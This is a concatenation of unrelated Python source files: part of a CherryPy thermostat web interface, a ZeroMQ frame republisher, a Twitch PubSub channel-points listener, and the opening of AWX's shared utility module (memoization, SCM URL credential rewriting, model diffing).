            return f.read()

    def _datetime_html( self ):
        # Current date/time labels converted from Kivy markup to HTML
        # (shared by every page; caller must hold thermostatLock).
        return dateLabel.text.replace( "[b]", "<b>" ).replace( "[/b]", "</b>" ) + ", " + timeLabel.text.replace( "[b]", "<b>" ).replace( "[/b]", "</b>" )

    @cherrypy.expose
    def index( self ):
        """Serve the main thermostat page with the live state filled in."""
        log( LOG_LEVEL_INFO, CHILD_DEVICE_WEBSERVER, MSG_SUBTYPE_TEXT, "Served thermostat.html to: " + cherrypy.request.remote.ip )
        html = self._template( "web/html/thermostat.html" )
        with thermostatLock:
            html = html.replace( "@@version@@", str( THERMOSTAT_VERSION ) )
            html = html.replace( "@@temp@@", str( setTemp ) )
            html = html.replace( "@@current@@", str( currentTemp ) + scaleUnits )
            html = html.replace( "@@minTemp@@", str( minTemp ) )
            html = html.replace( "@@maxTemp@@", str( maxTemp ) )
            html = html.replace( "@@tempStep@@", str( tempStep ) )
            # NOTE(review): the final replace below maps a space to a space,
            # which is a no-op — it looks like a mangled "&nbsp;" substitution;
            # confirm against the original template handling.
            status = statusLabel.text.replace( "[b]", "<b>" ).replace( "[/b]", "</b>" ).replace( "\n", "<br>" ).replace( " ", " " )
            status = status.replace( "[color=00ff00]", '<font color="red">' ).replace( "[/color]", '</font>' )
            html = html.replace( "@@status@@", status )
            html = html.replace( "@@dt@@", self._datetime_html() )
            html = html.replace( "@@heatChecked@@", "checked" if heatControl.state == "down" else "" )
            html = html.replace( "@@coolChecked@@", "checked" if coolControl.state == "down" else "" )
            html = html.replace( "@@fanChecked@@", "checked" if fanControl.state == "down" else "" )
            html = html.replace( "@@holdChecked@@", "checked" if holdControl.state == "down" else "" )
        return html

    @cherrypy.expose
    def set( self, temp, heat="off", cool="off", fan="off", hold="off" ):
        """Apply settings posted from the web form, then render the result page."""
        global setTemp
        log( LOG_LEVEL_INFO, CHILD_DEVICE_WEBSERVER, MSG_SUBTYPE_TEXT, "Set thermostat received from: " + cherrypy.request.remote.ip )
        tempChanged = setTemp != float( temp )
        with thermostatLock:
            setTemp = float( temp )
            # BUG FIX: the units were hard-coded as "c" here; every other
            # writer of setLabel (slider, scheduler) uses scaleUnits.
            setLabel.text = " Set\n[b]" + str( setTemp ) + scaleUnits + "[/b]"
            tempSlider.value = setTemp
            if tempChanged:
                log( LOG_LEVEL_STATE, CHILD_DEVICE_WEBSERVER, MSG_SUBTYPE_TEMPERATURE, str( setTemp ) )
            setControlState( heatControl, "down" if heat == "on" else "normal" )
            setControlState( coolControl, "down" if cool == "on" else "normal" )
            setControlState( fanControl,  "down" if fan  == "on" else "normal" )
            setControlState( holdControl, "down" if hold == "on" else "normal" )
            reloadSchedule()
        html = self._template( "web/html/thermostat_set.html" )
        with thermostatLock:
            html = html.replace( "@@version@@", str( THERMOSTAT_VERSION ) )
            html = html.replace( "@@dt@@", self._datetime_html() )
            html = html.replace( "@@temp@@", ( '<font color="red"><b>' if tempChanged else "" ) + str( setTemp ) + ( '</b></font>' if tempChanged else "" ) )
            html = html.replace( "@@heat@@", ( '<font color="red"><b>' if heat == "on" else "" ) + heat + ( '</b></font>' if heat == "on" else "" ) )
            html = html.replace( "@@cool@@", ( '<font color="red"><b>' if cool == "on" else "" ) + cool + ( '</b></font>' if cool == "on" else "" ) )
            html = html.replace( "@@fan@@",  ( '<font color="red"><b>' if fan  == "on" else "" ) + fan  + ( '</b></font>' if fan  == "on" else "" ) )
            html = html.replace( "@@hold@@", ( '<font color="red"><b>' if hold == "on" else "" ) + hold + ( '</b></font>' if hold == "on" else "" ) )
        return html

    @cherrypy.expose
    def schedule( self ):
        """Serve the schedule-editing page."""
        log( LOG_LEVEL_INFO, CHILD_DEVICE_WEBSERVER, MSG_SUBTYPE_TEXT, "Served thermostat_schedule.html to: " + cherrypy.request.remote.ip )
        html = self._template( "web/html/thermostat_schedule.html" )
        with thermostatLock:
            html = html.replace( "@@version@@", str( THERMOSTAT_VERSION ) )
            html = html.replace( "@@minTemp@@", str( minTemp ) )
            html = html.replace( "@@maxTemp@@", str( maxTemp ) )
            html = html.replace( "@@tempStep@@", str( tempStep ) )
            html = html.replace( "@@dt@@", self._datetime_html() )
        return html

    @cherrypy.expose
    @cherrypy.tools.json_in()
    def save( self ):
        """Persist a schedule posted as JSON, reload it, and confirm."""
        log( LOG_LEVEL_STATE, CHILD_DEVICE_WEBSERVER, MSG_SUBTYPE_TEXT, "Set schedule received from: " + cherrypy.request.remote.ip )
        schedule = cherrypy.request.json
        with scheduleLock:
            with open( "thermostat_schedule.json", "w" ) as f:
                f.write( json.dumps( schedule, indent = 4 ) )
        reloadSchedule()
        html = self._template( "web/html/thermostat_saved.html" )
        with thermostatLock:
            html = html.replace( "@@version@@", str( THERMOSTAT_VERSION ) )
            html = html.replace( "@@dt@@", self._datetime_html() )
        return html
def startWebServer():
    # Configure and run the CherryPy server (blocking; run in a daemon
    # thread by main()). Host/port come from the "web" settings entry,
    # with "discover" meaning "use this machine's detected IP".
    host = "discover" if not( settings.exists( "web" ) ) else settings.get( "web" )[ "host" ]
    cherrypy.server.socket_host = host if host != "discover" else get_ip_address()  # use machine IP address if host = "discover"
    cherrypy.server.socket_port = 80 if not( settings.exists( "web" ) ) else settings.get( "web" )[ "port" ]
    log( LOG_LEVEL_STATE, CHILD_DEVICE_WEBSERVER, MSG_SUBTYPE_TEXT, "Starting on " + cherrypy.server.socket_host + ":" + str( cherrypy.server.socket_port ) )
    # Static-file mappings: css/javascript/images directories plus the raw
    # schedule JSON and the favicon, all relative to the working directory.
    conf = {
        '/': {
            'tools.staticdir.root': os.path.abspath( os.getcwd() ),
            'tools.staticfile.root': os.path.abspath( os.getcwd() )
        },
        '/css': {
            'tools.staticdir.on': True,
            'tools.staticdir.dir': './web/css'
        },
        '/javascript': {
            'tools.staticdir.on': True,
            'tools.staticdir.dir': './web/javascript'
        },
        '/images': {
            'tools.staticdir.on': True,
            'tools.staticdir.dir': './web/images'
        },
        '/schedule.json': {
            'tools.staticfile.on': True,
            'tools.staticfile.filename': './thermostat_schedule.json'
        },
        '/favicon.ico': {
            'tools.staticfile.on': True,
            'tools.staticfile.filename': './web/images/favicon.ico'
        }
    }
    # Only echo requests to the screen in debug mode; no CherryPy log files.
    cherrypy.config.update(
        { 'log.screen': debug,
          'log.access_file': "",
          'log.error_file': ""
        }
    )
    cherrypy.quickstart ( WebInterface(), '/', conf )
##############################################################################
#                                                                            #
#                                 Main                                       #
#                                                                            #
##############################################################################

def main():
    # Start Web Server (daemon thread: dies with the process)
    webThread = threading.Thread( target=startWebServer )
    webThread.daemon = True
    webThread.start()
    # Start Scheduler (load jobs first, then run them on a daemon thread)
    reloadSchedule()
    schedThread = threading.Thread( target=startScheduler )
    schedThread.daemon = True
    schedThread.start()
    # Start Thermostat UI/App (blocks until the Kivy app exits)
    ThermostatApp().run()
if __name__ == '__main__':
    try:
        main()
    finally:
        # Always release hardware and I/O resources on the way out,
        # whatever caused the app to stop.
        log( LOG_LEVEL_STATE, CHILD_DEVICE_NODE, MSG_SUBTYPE_CUSTOM + "/shutdown", "Thermostat Shutting Down..." )
        GPIO.cleanup()
        if logFile is not None:
            # Flush buffered log data all the way to disk before closing.
            logFile.flush()
            os.fsync( logFile.fileno() )
            logFile.close()
        if mqttEnabled:
            mqttc.loop_stop()
            mqttc.disconnect()
|
pub.py | import zmq
import time
import multiprocessing as mp
import pystreaming.video.interface as intf
TIMESTEP = 0.01
def pullpub_ps(shutdown, infd, outfd, rcvhwm, sndhwm):
    """Child-process body: forward frames from a PULL socket to a PUB socket.

    Args:
        shutdown (mp.Event): set by the parent to request a clean exit.
        infd (str): zmq descriptor the PULL socket binds to.
        outfd (str): zmq descriptor the PUB socket binds to.
        rcvhwm (int): receive high-water mark for the PULL socket.
        sndhwm (int): send high-water mark for the PUB socket.
    """
    context = zmq.Context()
    socket = context.socket(zmq.PULL)
    socket.setsockopt(zmq.RCVHWM, rcvhwm)
    socket.bind(infd)
    out = context.socket(zmq.PUB)
    out.setsockopt(zmq.SNDHWM, sndhwm)
    out.bind(outfd)
    poller = zmq.Poller()
    poller.register(socket, zmq.POLLIN)
    while not shutdown.is_set():
        target = time.time() + TIMESTEP
        # Poll with zero timeout so a quiet input never blocks shutdown.
        if poller.poll(0):
            try:
                # Forward one (buffer, index) frame; NOBLOCK on both ends so
                # a slow subscriber can't stall the loop.
                buf, idx = intf.recv(socket, buf=True, flags=zmq.NOBLOCK)
                intf.send(out, idx, buf=buf, flags=zmq.NOBLOCK)
            except zmq.error.Again:
                # Nothing readable / send would block — just skip this tick.
                pass
        missing = target - time.time()
        if missing > 0:
            time.sleep(missing)  # loop takes at minimum TIMESTEP seconds
class Publisher:
    """Republish a local zmq PULL stream through a PUB endpoint.

    The forwarding loop runs in a separate daemon process so it never
    blocks the parent.
    """

    # High-water marks handed to the child process's sockets.
    rcvhwm = sndhwm = 10

    def __init__(self, endpoint, seed=""):
        """Create a multiprocessing publisher.

        Binds to a zmq PULL socket and republishes through a PUB socket.

        Args:
            endpoint (str): Descriptor of stream publishing endpoint.
            seed (str, optional): File descriptor seed (to prevent ipc collisions). Defaults to "".
        """
        self.infd = "ipc:///tmp/encout" + seed
        self.outfd = endpoint
        self.shutdown = mp.Event()
        self.psargs = (self.shutdown, self.infd, self.outfd, self.rcvhwm, self.sndhwm)
        self.ps = None  # None while stopped; the mp.Process while running

    def start(self):
        """Create and start multiprocessing publisher threads.

        Raises:
            RuntimeError: Raised when method is called while a Publisher is running.
        """
        if self.ps is not None:
            # BUG FIX: message had a typo ("runnning").
            raise RuntimeError("Tried to start a running Publisher obj")
        self.ps = mp.Process(target=pullpub_ps, args=self.psargs)
        self.ps.daemon = True
        self.ps.start()
        print(self)

    def stop(self):
        """Join and destroy multiprocessing publisher threads.

        Raises:
            RuntimeError: Raised when method is called while a Publisher is stopped.
        """
        if self.ps is None:
            raise RuntimeError("Tried to stop a stopped Publisher obj")
        self.shutdown.set()
        self.ps.join()
        self.ps = None
        self.shutdown.clear()  # allow a later start() to reuse this object

    def __repr__(self):
        rpr = ""
        rpr += "-----Publisher-----\n"
        rpr += f"IN:\t{self.infd}\n"
        rpr += f"OUT:\t{self.outfd}\n"
        rpr += f"HWM:\t=IN> {self.rcvhwm})::({self.sndhwm} =OUT> "
        return rpr
|
pubsub.py | import json
import threading
import time
from random import randrange
import websocket # pip install websocket-client
from claim_bonus import claim_channel_points_bonus
from raid import update_raid, Raid
from twitch_data import *
# For documentation on Twitch PubSub API, see https://dev.twitch.tv/docs/pubsub
def listen_for_channel_points():
    """Open PubSub websocket connections covering every needed topic."""
    pool = WebsocketsPool()
    for needed_topic in get_needed_topics():
        pool.submit(needed_topic)
def get_needed_topics():
    """Build the list of PubSub topics to subscribe to.

    One user-level community-points topic, plus a playback topic and a
    raid topic for every configured streamer.
    """
    topics = [PubsubTopic("community-points-user-v1")]
    for login in get_streamer_logins():
        topics.extend(
            [
                PubsubTopic("video-playback-by-id", login),
                PubsubTopic("raid", login),
            ]
        )
    return topics
def on_open(ws):
    """Websocket open callback: subscribe to all topics and keep the link alive."""

    def keepalive():
        # Initial ping, then LISTEN for every topic.
        ping(ws)
        for needed_topic in get_needed_topics():
            listen_for_topic(ws, needed_topic)
        # Periodic keep-alive pings until the socket is flagged closed.
        while not ws.is_closed:
            ping(ws)
            time.sleep(30)

    threading.Thread(target=keepalive).start()
# Dedup state shared across every websocket's on_message callback.
last_message_time = 0
last_message_type = None
def on_message(ws, message):
    """Dispatch a PubSub frame: points events, playback state, raids.

    Rebinds the local name ``message`` to the inner (decoded) payload once
    the envelope has been unwrapped.
    """
    global last_message_time, last_message_type
    response = json.loads(message)
    if response["type"] == "MESSAGE":
        # print("Received message: ", response)
        data = response["data"]
        # topic strings look like "<topic-name>.<numeric id>"
        topic, topic_user = data["topic"].split(".")
        message = json.loads(data["message"])
        message_type = message["type"]
        message_data = None
        if "data" in message:
            message_data = message["data"]
        # If we have more than one PubSub connection, messages may be duplicated
        if time.time() - last_message_time < 0.1 and last_message_type == message_type:
            last_message_time = time.time()
            return
        last_message_time = time.time()
        last_message_type = message_type
        if topic == "community-points-user-v1":
            if message_type == "points-earned":
                channel_id = message_data["channel_id"]
                if channel_id in get_streamer_ids():
                    new_balance = message_data["balance"]["balance"]
                    channel_login = get_login_by_channel_id(channel_id)
                    reason_name = get_reason_name(message_data["point_gain"]["reason_code"])
                    print(f"{new_balance} баллов канала для {channel_login}! Причина: {reason_name}.")
            elif message_type == "claim-available":
                channel_id = message_data["claim"]["channel_id"]
                if channel_id in get_streamer_ids():
                    claim_id = message_data["claim"]["id"]
                    streamer_login = get_login_by_channel_id(channel_id)
                    claim_channel_points_bonus(streamer_login, claim_id)
        elif topic == "video-playback-by-id":
            channel_login = get_login_by_channel_id(topic_user)
            if message_type == "stream-down":
                set_offline(channel_login)
            elif message_type == "viewcount":
                check_online(channel_login)
            # there is stream-up message type, but it's sent earlier than the API updates
        elif topic == "raid":
            channel_login = get_login_by_channel_id(topic_user)
            if message_type == "raid_update_v2":
                # streamer_login is going to raid someone
                raid_info = message["raid"]
                raid = Raid(raid_info["id"], raid_info["target_login"])
                update_raid(channel_login, raid)
    elif response["type"] == "RESPONSE" and len(response.get("error", "")) > 0:
        raise RuntimeError(f"Error while trying to listen for a topic: {response}")
    elif response["type"] == "RECONNECT":
        WebsocketsPool.handle_websocket_reconnection(ws)
def get_reason_name(code):
    """Translate a point-gain reason code into human-readable lowercase text."""
    readable = code.replace("_", " ")
    return readable.replace("CLAIM", "bonus claimed").lower()
class PubsubTopic:
    """A single PubSub topic, optionally bound to a streamer's channel."""

    def __init__(self, topic, channel_login=None):
        self.topic = topic
        self.channel_login = channel_login

    def is_user_topic(self):
        """A topic with no channel login targets the logged-in user."""
        return self.channel_login is None

    def __str__(self):
        if self.is_user_topic():
            return f"{self.topic}.{get_user_id()}"
        return f"{self.topic}.{get_channel_id(self.channel_login)}"
class WebsocketsPool: # you can't listen for more than 50 topics at once
    """Grow-on-demand pool of PubSub websockets, max 50 topics per socket."""

    def __init__(self):
        # The most recently created socket; new topics go here until full.
        self.free_websocket = None
    def submit(self, pubsub_topic):
        """Attach a topic to the current socket, creating a new one when full."""
        if self.free_websocket is None or len(self.free_websocket.topics) >= 50:
            self.create_new_websocket()
        self.free_websocket.topics.append(pubsub_topic)
        # LISTEN immediately if connected; otherwise queue for on_open.
        if not self.free_websocket.is_opened:
            self.free_websocket.pending_topics.append(pubsub_topic)
        else:
            listen_for_topic(self.free_websocket, pubsub_topic)
    def create_new_websocket(self):
        """Spin up a new WebSocketApp with pool bookkeeping attributes."""
        self.free_websocket = websocket.WebSocketApp("wss://pubsub-edge.twitch.tv/v1",
            on_message=on_message, on_open=WebsocketsPool.on_open, on_close=WebsocketsPool.handle_websocket_reconnection)
        # Extra attributes stored directly on the WebSocketApp instance.
        self.free_websocket.parent_pool = self
        self.free_websocket.is_closed = False
        self.free_websocket.is_opened = False
        self.free_websocket.topics = []
        self.free_websocket.pending_topics = []
        # run_forever blocks, so each socket gets its own thread.
        threading.Thread(target=lambda: self.free_websocket.run_forever()).start()
    @staticmethod
    def on_open(ws):
        """Open callback: flush pending LISTENs, then ping every 30 seconds."""
        def run():
            ws.is_opened = True
            ping(ws)
            for topic in ws.pending_topics:
                listen_for_topic(ws, topic)
            while not ws.is_closed:
                ping(ws)
                time.sleep(30)
        threading.Thread(target=run).start()
    @staticmethod
    def handle_websocket_reconnection(ws):
        """Close callback: wait 30s, then resubmit this socket's topics to the pool."""
        ws.is_closed = True
        print("Повторное подключение к серверу Twitch PubSub через 30 секунд")
        # NOTE(review): this sleeps in the callback's thread for 30 seconds.
        time.sleep(30)
        # Recover the owning pool from the socket itself.
        self = ws.parent_pool
        if self.free_websocket == ws:
            self.free_websocket = None
        for topic in ws.topics:
            self.submit(topic)
def listen_for_topic(ws, topic):
    """Send a LISTEN request for a single topic over the websocket.

    Bug fix: the original tested ``topic.is_user_topic`` — a bound method
    reference, which is always truthy — instead of calling it, so the auth
    token was attached to every topic rather than only user-scoped ones.
    """
    data = {"topics": [str(topic)]}
    if topic.is_user_topic():
        # Only user-scoped topics require the OAuth token.
        data["auth_token"] = get_auth_token()
    nonce = create_nonce()
    send(ws, {"type": "LISTEN", "nonce": nonce, "data": data})
def ping(ws):
    """Send a PubSub keep-alive PING frame."""
    payload = {"type": "PING"}
    send(ws, payload)
def send(ws, request):
    """Serialize *request* as compact JSON and write it to the websocket."""
    ws.send(json.dumps(request, separators=(',', ':')))
# https://en.wikipedia.org/wiki/Cryptographic_nonce
def create_nonce(length=30):
    """Return a random alphanumeric nonce of *length* characters.

    Characters are drawn uniformly from digits, then lowercase, then
    uppercase letters — one randrange(0, 62) draw per character.
    """
    alphabet = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
    return "".join(alphabet[randrange(0, len(alphabet))] for _ in range(length))
|
common.py | # Copyright (c) 2015 Ansible, Inc.
# All Rights Reserved.
# Python
import json
import yaml
import logging
import os
import re
import subprocess
import stat
import urllib.parse
import threading
import contextlib
import tempfile
import psutil
from functools import reduce, wraps
from decimal import Decimal
# Django
from django.core.exceptions import ObjectDoesNotExist, FieldDoesNotExist
from django.utils.translation import ugettext_lazy as _
from django.utils.functional import cached_property
from django.db.models.fields.related import ForeignObjectRel, ManyToManyField
from django.db.models.fields.related_descriptors import ForwardManyToOneDescriptor, ManyToManyDescriptor
from django.db.models.query import QuerySet
from django.db.models import Q
# Django REST Framework
from rest_framework.exceptions import ParseError
from django.utils.encoding import smart_str
from django.utils.text import slugify
from django.apps import apps
# AWX
from awx.conf.license import get_license
logger = logging.getLogger('awx.main.utils')
# Public API of this utilities module; names not listed here are internal.
__all__ = [
    'get_object_or_400',
    'camelcase_to_underscore',
    'underscore_to_camelcase',
    'memoize',
    'memoize_delete',
    'get_licenser',
    'get_awx_http_client_headers',
    'get_awx_version',
    'update_scm_url',
    'get_type_for_model',
    'get_model_for_type',
    'copy_model_by_class',
    'copy_m2m_relationships',
    'prefetch_page_capabilities',
    'to_python_boolean',
    'ignore_inventory_computed_fields',
    'ignore_inventory_group_removal',
    '_inventory_updates',
    'get_pk_from_dict',
    'getattrd',
    'getattr_dne',
    'NoDefaultProvided',
    'get_current_apps',
    'set_current_apps',
    'extract_ansible_vars',
    'get_search_fields',
    'get_system_task_capacity',
    'get_cpu_capacity',
    'get_mem_capacity',
    'model_to_dict',
    'NullablePromptPseudoField',
    'model_instance_diff',
    'parse_yaml_or_json',
    'RequireDebugTrueOrTest',
    'has_model_field_prefetched',
    'set_environ',
    'IllegalArgumentError',
    'get_custom_venv_choices',
    'get_external_account',
    'task_manager_bulk_reschedule',
    'schedule_task_manager',
    'classproperty',
    'create_temporary_fifo',
    'truncate_stdout',
    'deepmerge',
]
def get_object_or_400(klass, *args, **kwargs):
    """
    Return a single object from the given model or queryset based on the query
    params, otherwise raise an exception that will return in a 400 response.
    """
    from django.shortcuts import _get_queryset

    queryset = _get_queryset(klass)
    try:
        return queryset.get(*args, **kwargs)
    except (queryset.model.DoesNotExist, queryset.model.MultipleObjectsReturned) as e:
        # Both lookup failures are surfaced as a DRF ParseError -> HTTP 400.
        raise ParseError(*e.args)
def to_python_boolean(value, allow_none=False):
    """Coerce common textual representations into True/False (or None)."""
    lowered = str(value).lower()
    if lowered in ('true', '1', 't'):
        return True
    if lowered in ('false', '0', 'f'):
        return False
    if allow_none and lowered in ('none', 'null'):
        return None
    raise ValueError(_(u'Unable to convert "%s" to boolean') % value)
def camelcase_to_underscore(s):
    """
    Convert CamelCase names to lowercase_with_underscore.
    """
    # Insert '_' before an uppercase letter that either follows a lowercase
    # letter or starts a new word (i.e. is not part of an acronym run).
    boundary = r'(((?<=[a-z])[A-Z])|([A-Z](?![A-Z]|$)))'
    underscored = re.sub(boundary, r'_\1', s)
    return underscored.lower().strip('_')
def underscore_to_camelcase(s):
    """
    Convert lowercase_with_underscore names to CamelCase.
    """
    # Empty segments (from doubled underscores) are kept as literal '_'.
    segments = [part.capitalize() or '_' for part in s.split('_')]
    return ''.join(segments)
class RequireDebugTrueOrTest(logging.Filter):
    """
    Logging filter to output when in DEBUG mode or running tests.
    """

    def filter(self, log_record):
        # Imported lazily so module import does not require configured settings.
        from django.conf import settings

        return settings.DEBUG or settings.IS_TESTING()
class IllegalArgumentError(ValueError):
    """Raised when a function is called with an unsupported argument combination."""

    pass
def get_memoize_cache():
    """Return the Django cache backend used by the memoize helpers."""
    from django.core.cache import cache

    return cache
def memoize(ttl=60, cache_key=None, track_function=False, cache=None):
    """
    Decorator to wrap a function and cache its result.

    :param ttl: cache entry lifetime in seconds.
    :param cache_key: explicit cache key; incompatible with track_function.
    :param track_function: when True, store all results for one function
        under a single key (a dict keyed by the call's args/kwargs).
    :param cache: cache backend override; defaults to the Django cache.
    :raises IllegalArgumentError: if both cache_key and track_function are given.
    """
    if cache_key and track_function:
        raise IllegalArgumentError("Can not specify cache_key when track_function is True")
    cache = cache or get_memoize_cache()
    def memoize_decorator(f):
        @wraps(f)
        def _memoizer(*args, **kwargs):
            if track_function:
                # One cache entry per function; results nested per-arguments.
                cache_dict_key = slugify('%r %r' % (args, kwargs))
                key = slugify("%s" % f.__name__)
                cache_dict = cache.get(key) or dict()
                if cache_dict_key not in cache_dict:
                    value = f(*args, **kwargs)
                    cache_dict[cache_dict_key] = value
                    cache.set(key, cache_dict, ttl)
                else:
                    value = cache_dict[cache_dict_key]
            else:
                # One cache entry per (function, arguments) combination.
                key = cache_key or slugify('%s %r %r' % (f.__name__, args, kwargs))
                value = cache.get(key)
                # NOTE(review): a legitimately-None result is never cached and
                # will be recomputed on every call.
                if value is None:
                    value = f(*args, **kwargs)
                    cache.set(key, value, ttl)
            return value
        return _memoizer
    return memoize_decorator
def memoize_delete(function_name):
    """Drop the cached results stored for *function_name* by @memoize."""
    return get_memoize_cache().delete(function_name)
def get_awx_version():
    """
    Return AWX version as reported by setuptools.
    """
    from awx import __version__

    try:
        import pkg_resources

        version = pkg_resources.require('awx')[0].version
    except Exception:
        # Fall back to the package's own __version__ when metadata is missing.
        version = __version__
    return version
def get_awx_http_client_headers():
    """Build the default HTTP headers (content type + user agent) for AWX clients.

    The user agent advertises "AWX" for the open license and
    "Red Hat Ansible Tower" otherwise, plus the version and license type.
    """
    # Renamed local from `license` to avoid shadowing the builtin.
    license_type = get_license().get('license_type', 'UNLICENSED')
    product = 'AWX' if license_type == 'open' else 'Red Hat Ansible Tower'
    headers = {
        'Content-Type': 'application/json',
        'User-Agent': '{} {} ({})'.format(product, get_awx_version(), license_type),
    }
    return headers
def get_licenser(*args, **kwargs):
    """Instantiate the license handler appropriate for this installation."""
    from awx.main.utils.licensing import Licenser, OpenLicense

    try:
        # Tower installs drop a marker file; everything else is open.
        if not os.path.exists('/var/lib/awx/.tower_version'):
            return OpenLicense()
        return Licenser(*args, **kwargs)
    except Exception as e:
        raise ValueError(_('Error importing Tower License: %s') % e)
def update_scm_url(scm_type, url, username=True, password=True, check_special_cases=True, scp_format=False):
    """
    Update the given SCM URL to add/replace/remove the username/password. When
    username/password is True, preserve existing username/password, when
    False (None, '', etc.), remove any existing username/password, otherwise
    replace username/password. Also validates the given URL.
    """
    # Handle all of the URL formats supported by the SCM systems:
    # git: https://www.kernel.org/pub/software/scm/git/docs/git-clone.html#URLS
    # svn: http://svnbook.red-bean.com/en/1.7/svn-book.html#svn.advanced.reposurls
    if scm_type not in ('git', 'svn', 'insights', 'archive'):
        raise ValueError(_('Unsupported SCM type "%s"') % str(scm_type))
    if not url.strip():
        return ''
    parts = urllib.parse.urlsplit(url)
    try:
        # Accessing .port raises ValueError when the port is not a valid integer.
        parts.port
    except ValueError:
        raise ValueError(_('Invalid %s URL') % scm_type)
    if parts.scheme == 'git+ssh' and not scp_format:
        raise ValueError(_('Unsupported %s URL') % scm_type)
    if '://' not in url:
        # Handle SCP-style URLs for git (e.g. [user@]host.xz:path/to/repo.git/).
        if scm_type == 'git' and ':' in url:
            if '@' in url:
                userpass, hostpath = url.split('@', 1)
            else:
                userpass, hostpath = '', url
            if hostpath.count(':') > 1:
                raise ValueError(_('Invalid %s URL') % scm_type)
            host, path = hostpath.split(':', 1)
            # if not path.startswith('/') and not path.startswith('~/'):
            #     path = '~/%s' % path
            # if path.startswith('/'):
            #     path = path.lstrip('/')
            hostpath = '/'.join([host, path])
            modified_url = '@'.join(filter(None, [userpass, hostpath]))
            # git+ssh scheme identifies URLs that should be converted back to
            # SCP style before passed to git module.
            parts = urllib.parse.urlsplit('git+ssh://%s' % modified_url)
        # Handle local paths specified without file scheme (e.g. /path/to/foo).
        # Only supported by git.
        elif scm_type == 'git':
            if not url.startswith('/'):
                parts = urllib.parse.urlsplit('file:///%s' % url)
            else:
                parts = urllib.parse.urlsplit('file://%s' % url)
        else:
            raise ValueError(_('Invalid %s URL') % scm_type)
    # Validate that scheme is valid for given scm_type.
    scm_type_schemes = {
        'git': ('ssh', 'git', 'git+ssh', 'http', 'https', 'ftp', 'ftps', 'file'),
        'svn': ('http', 'https', 'svn', 'svn+ssh', 'file'),
        'insights': ('http', 'https'),
        'archive': ('http', 'https'),
    }
    if parts.scheme not in scm_type_schemes.get(scm_type, ()):
        raise ValueError(_('Unsupported %s URL') % scm_type)
    if parts.scheme == 'file' and parts.netloc not in ('', 'localhost'):
        raise ValueError(_('Unsupported host "%s" for file:// URL') % (parts.netloc))
    elif parts.scheme != 'file' and not parts.netloc:
        raise ValueError(_('Host is required for %s URL') % parts.scheme)
    # username/password tri-state: True = keep existing, falsy = strip,
    # anything else = replace with the given value.
    if username is True:
        netloc_username = parts.username or ''
    elif username:
        netloc_username = username
    else:
        netloc_username = ''
    if password is True:
        netloc_password = parts.password or ''
    elif password:
        netloc_password = password
    else:
        netloc_password = ''
    # Special handling for github/bitbucket SSH URLs.
    if check_special_cases:
        special_git_hosts = ('github.com', 'bitbucket.org', 'altssh.bitbucket.org')
        if scm_type == 'git' and parts.scheme.endswith('ssh') and parts.hostname in special_git_hosts and netloc_username != 'git':
            raise ValueError(_('Username must be "git" for SSH access to %s.') % parts.hostname)
        if scm_type == 'git' and parts.scheme.endswith('ssh') and parts.hostname in special_git_hosts and netloc_password:
            # raise ValueError('Password not allowed for SSH access to %s.' % parts.hostname)
            netloc_password = ''
    if netloc_username and parts.scheme != 'file' and scm_type not in ("insights", "archive"):
        netloc = u':'.join([urllib.parse.quote(x, safe='') for x in (netloc_username, netloc_password) if x])
    else:
        netloc = u''
    netloc = u'@'.join(filter(None, [netloc, parts.hostname]))
    if parts.port:
        netloc = u':'.join([netloc, str(parts.port)])
    new_url = urllib.parse.urlunsplit([parts.scheme, netloc, parts.path, parts.query, parts.fragment])
    if scp_format and parts.scheme == 'git+ssh':
        # Convert back to the SCP form (host:path) expected by git.
        new_url = new_url.replace('git+ssh://', '', 1).replace('/', ':', 1)
    return new_url
def get_allowed_fields(obj, serializer_mapping):
    """Return the field names of *obj* eligible for activity-stream recording.

    Uses the mapped serializer's writable fields when available, otherwise
    all concrete model fields; then removes per-model exclusions.
    """
    if serializer_mapping is not None and obj.__class__ in serializer_mapping:
        serializer_actual = serializer_mapping[obj.__class__]()
        allowed_fields = [x for x in serializer_actual.fields if not serializer_actual.fields[x].read_only] + ['id']
    else:
        allowed_fields = [x.name for x in obj._meta.fields]
    # Fields that should never be recorded for these models.
    ACTIVITY_STREAM_FIELD_EXCLUSIONS = {'user': ['last_login'], 'oauth2accesstoken': ['last_used'], 'oauth2application': ['client_secret']}
    model_name = obj._meta.model_name
    fields_excluded = ACTIVITY_STREAM_FIELD_EXCLUSIONS.get(model_name, [])
    # see definition of from_db for CredentialType
    # injection logic of any managed types are incompatible with activity stream
    if model_name == 'credentialtype' and obj.managed_by_tower and obj.namespace:
        fields_excluded.extend(['inputs', 'injectors'])
    if fields_excluded:
        allowed_fields = [f for f in allowed_fields if f not in fields_excluded]
    return allowed_fields
def _convert_model_field_for_display(obj, field_name, password_fields=None):
    """Render one model field value as a display-safe scalar or string.

    Password-like or encrypted values are masked as the literal 'hidden';
    lists/dicts are JSON-encoded; other non-primitive values are stringified.
    """
    # NOTE: Careful modifying the value of field_val, as it could modify
    # underlying model object field value also.
    try:
        field_val = getattr(obj, field_name, None)
    except ObjectDoesNotExist:
        # Related row is gone; show a placeholder with the dangling FK id.
        return '<missing {}>-{}'.format(obj._meta.verbose_name, getattr(obj, '{}_id'.format(field_name)))
    if password_fields is None:
        password_fields = set(getattr(type(obj), 'PASSWORD_FIELDS', [])) | set(['password'])
    if field_name in password_fields or (isinstance(field_val, str) and field_val.startswith('$encrypted$')):
        return u'hidden'
    # Prefer a model-provided display method when one exists.
    if hasattr(obj, 'display_%s' % field_name):
        field_val = getattr(obj, 'display_%s' % field_name)()
    if isinstance(field_val, (list, dict)):
        try:
            field_val = json.dumps(field_val, ensure_ascii=False)
        except Exception:
            pass
    if type(field_val) not in (bool, int, type(None)):
        field_val = smart_str(field_val)
    return field_val
def model_instance_diff(old, new, serializer_mapping=None):
    """
    Calculate the differences between two model instances. One of the instances may be None (i.e., a newly
    created model or deleted model). This will cause all fields with a value to have changed (from None).
    serializer_mapping are used to determine read-only fields.
    When provided, read-only fields will not be included in the resulting dictionary

    Returns a dict of {field: (old_display, new_display)} or None when nothing changed.
    """
    from django.db.models import Model
    if not (old is None or isinstance(old, Model)):
        raise TypeError('The supplied old instance is not a valid model instance.')
    if not (new is None or isinstance(new, Model)):
        raise TypeError('The supplied new instance is not a valid model instance.')
    # Each side masks with its own class's password-field list.
    old_password_fields = set(getattr(type(old), 'PASSWORD_FIELDS', [])) | set(['password'])
